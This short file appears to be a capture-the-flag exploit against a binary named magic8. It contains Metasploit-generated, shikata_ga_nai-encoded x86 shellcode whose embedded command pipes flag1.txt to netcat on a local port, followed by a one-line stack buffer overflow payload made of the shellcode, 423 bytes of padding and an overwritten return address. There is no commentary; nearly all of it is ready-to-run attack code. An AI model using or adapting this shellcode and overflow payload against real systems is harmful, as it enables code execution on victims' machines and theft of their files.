# linux/x86/exec - 101 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, MeterpreterDebugLevel=0, 
# RemoteMeterpreterDebugFile=, CMD=cat flag1.txt | nc -w 3 
# 127.0.0.1 3333
buf = 
"\xb8\xb5\x0e\xa7\x28\xd9\xc5\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x83\xc2\x04\x31\x42\x10\x03\x42\x10\x57\xfb\xcd" +
"\x23\xcf\x9d\x40\x52\x87\xb0\x07\x13\xb0\xa3\xe8\x50\x56" +
"\x34\x9f\xb9\xc4\x5d\x31\x4f\xeb\xcc\x25\x68\xeb\xf0\xb5" +
"\x14\x8a\x84\x95\xbc\x20\x04\xb1\x71\x96\xb2\x45\x06\xc6" +
"\x46\x96\x88\x65\x97\xfb\x23\x49\xe4\x23\xfd\xbb\x3d\x0a" +
"\xcd\x95\x71\x7c\x1c\xc9\x42\xb3\x6d\x3a\xa5\xe4\xc2\xb5" +
"\x44\xc7\x65"

./magic8 127.0.0.1 "$(python -c 'print ""\xb8\xb5\x0e\xa7\x28\xd9\xc5\xd9\x74\x24\xf4\x5a\x29\xc9"+ "\xb1\x13\x83\xc2\x04\x31\x42\x10\x03\x42\x10\x57\xfb\xcd"+ "\x23\xcf\x9d\x40\x52\x87\xb0\x07\x13\xb0\xa3\xe8\x50\x56" +
"\x34\x9f\xb9\xc4\x5d\x31\x4f\xeb\xcc\x25\x68\xeb\xf0\xb5" +
"\x14\x8a\x84\x95\xbc\x20\x04\xb1\x71\x96\xb2\x45\x06\xc6" +
"\x46\x96\x88\x65\x97\xfb\x23\x49\xe4\x23\xfd\xbb\x3d\x0a" +
"\xcd\x95\x71\x7c\x1c\xc9\x42\xb3\x6d\x3a\xa5\xe4\xc2\xb5" +
"\x44\xc7\x65"" +"A"*423+"\x4c\x3d\xbb\xff"')"
